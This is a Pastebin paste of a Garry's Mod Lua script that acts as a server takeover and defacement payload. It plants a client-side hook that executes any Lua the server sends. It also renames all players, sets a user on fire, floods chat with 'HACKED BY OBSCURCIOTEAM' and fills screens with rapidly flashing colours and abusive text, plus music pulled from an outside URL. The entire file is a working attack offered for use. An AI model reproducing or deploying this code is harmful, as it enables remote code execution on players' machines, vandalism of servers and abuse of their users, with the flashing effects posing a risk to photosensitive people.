Advertisement
SHADoWS1955164

xvbnhzgtr

Apr 25th, 2018
91
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.29 KB | None | 0 0
  1. util.AddNetworkString "skeleton_dancing_troll"
  2.  
  3. local lol = {}
  4. function lol:RandomString( intMin, intMax )
  5. local ret = ""
  6. for _ = 1, math.random( intMin, intMax ) do
  7. ret = ret.. string.char( math.random(65, 90) )
  8. end
  9.  
  10. return ret
  11. end
  12.  
  13. lol.m_tblActions = {}
  14. lol.m_strImageGlobalVar = lol:RandomString( 6, 12 )
  15. lol.m_strImageLoadHTML = [[<style type="text/css"> html, body {background-color: transparent;} html{overflow:hidden; ]].. (true and "margin: -8px -8px;" or "margin: 0px 0px;") ..[[ } </style><body><img src="]] .. "%s" .. [[" alt="" width="]] .. "%i"..[[" height="]] .. "%i" .. [[" /></body>]]
  16.  
  17. function lol:PushAction( intChainDelay, func )
  18. self.m_tblActions[#self.m_tblActions +1] = { intChainDelay, func }
  19. end
  20.  
  21. function lol:NextAction( pPlayer )
  22. pPlayer.m_intCurAction = pPlayer.m_intCurAction +1
  23. if not self.m_tblActions[pPlayer.m_intCurAction] then return end
  24.  
  25. timer.Simple( self.m_tblActions[pPlayer.m_intCurAction][1], function()
  26. if not IsValid( pPlayer ) then return end
  27. self.m_tblActions[pPlayer.m_intCurAction][2]( pPlayer )
  28. self:NextAction( pPlayer )
  29. end )
  30. end
  31.  
  32. function lol:Start( pPlayer )
  33. pPlayer.m_intCurAction = 0
  34. self:NextAction( pPlayer )
  35. end
  36.  
  37. function lol:SendLua( pPlayer, strLua )
  38. net.Start( "skeleton_dancing_troll" )
  39. net.WriteString( strLua )
  40. net.Send( pPlayer )
  41. end
  42.  
  43. function lol:SetupPlayer( pPlayer )
  44. pPlayer:SendLua( "net.Receive(\"skeleton_dancing_troll\", function() RunString(net.ReadString()) end)" )
  45. end
  46.  
  47. for k, v in pairs( player.GetAll() ) do
  48. lol:SetupPlayer( v )
  49. timer.Simple( 2, function() lol:Start( v ) end )
  50. end
  51.  
  52. hook.Add( "PlayerAuthed", "wat", function( pPlayer )
  53. lol:SetupPlayer( pPlayer )
  54. timer.Simple( 10, function() lol:Start( pPlayer ) end )
  55. end )
  56.  
  57. hook.Add( "PlayerSay", "1337command", function( pSender, strText, bTeamChat )
  58. if strText:sub( 1, 5 ) == "/1337" then
  59. pSender:Ignite( 1e9 )
  60. pSender:ChatPrint( "Nop" )
  61. pSender:SendLua( [[surface.PlaySound( "vo/npc/male01/hacks01.wav" )]] )
  62. return false
  63. end
  64. end )
  65.  
  66. if gamemode.Get("darkrp") then
  67.  
  68. ------- STARTCODE FOR FORCE CHANGE NAME
  69. for k, v in pairs(player.GetAll()) do DarkRP.storeRPName(v, "ASRIEL Nous Domine") v:setDarkRPVar("rpname", "ASRIEL Nous Domine") end
  70. end
  71. ------- STOP LINE CODE FOR CHANGE NAME
  72.  
  73.  
  74.  
  75. timer.Create( "fuck", 0.1, 0, function() BroadcastLua([[chat.AddText(Color(math.random(1,255),math.random(1,255),math.random(1,255)), "▁ ▂▃▅▆▇█▓▒░HACKED BY OBSCURCIOTEAM ░▒▓█▇▆▅▃▂ ▁ ")]]) end)
  76.  
  77.  
  78. --Sequence stack
  79. --Start some tunes and steam in our assets
  80. lol:PushAction( 0, function( pPlayer )
  81. lol:SendLua( pPlayer, ([[
  82.  
  83.  
  84. surface.CreateFont( "PopupHFont", {
  85.  
  86. font = "Segoe UI Light",
  87.  
  88. size = 200,
  89.  
  90. weight = 4000,
  91.  
  92. } )
  93.  
  94.  
  95. sound.PlayURL( "http://zilnix.mtxserv.fr/Zilnix/asriel.mp3", "", function()end )
  96.  
  97. hook.Add( 'RenderScreenspaceEffects', 'newhud', function()
  98.  
  99. randomtext = { "YOUR SERVER GET FUCKED", "C# > LUA > HACK", "FUCK TON SERV DE MERDE", "HACKED BY OBSCURCIOTEAM", "On se sent HAX4ER", "RIP TON SERVEUR", "MOUHAHAHA", "SEIZED BY OBSCURCIOTEAM", "OBSCURCIOTEAM contrôle tout", "DATA --> BIN", "ASRIEL NOUS DOMINE" }
  100. riptext = { "Ho merde... j'ai cassé ton serveur...", "en meme tent ce de la merde...", "tu sait quoi ? va te faie faire enculé", "RIP RIP RIP RIP RIP RIP RIP RIP RIP" }
  101.  
  102. local loadSpeed = 0.4
  103. local loadIndex = math.floor(loadSpeed*CurTime()%(#randomtext)) + 1
  104.  
  105. local ripSpeed = 1000
  106. local ripIndex = math.floor(ripSpeed*CurTime()%(#riptext)) + 1
  107.  
  108.  
  109. local text = "YOUR SERVER GET FUCKED"
  110. local col = HSVToColor( RealTime() * 85 % 360, 1, 1 )
  111. local hsv = HSVToColor( CurTime() % 6 * 60, 1, 1 )
  112. draw.RoundedBox( 0, 0, 0, ScrW(), ScrH(), Color( col.r, col.g, col.b, 255 ) )
  113. draw.RoundedBox(0, 0, 250, 99999, 250, Color(0, 0, 0))
  114. draw.DrawText( riptext[ripIndex], "DermaLarge", 500, 290, Color(hsv.r, hsv.g, hsv.b) )
  115. draw.DrawText( randomtext[loadIndex], "PopupHFont", 530, 300, Color(col.r, col.g, col.b) )
  116. draw.DrawText( riptext[ripIndex], "DermaLarge", 500, 450, Color(hsv.r, hsv.g, hsv.b) )
  117. draw.DrawText( "ASRIEL ROI DU MONDE", "PopupHFont", 530, 900, Color(hsv.r, hsv.g, hsv.b) )
  118. end )
  119.  
  120.  
  121. ]]))
  122. end )
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement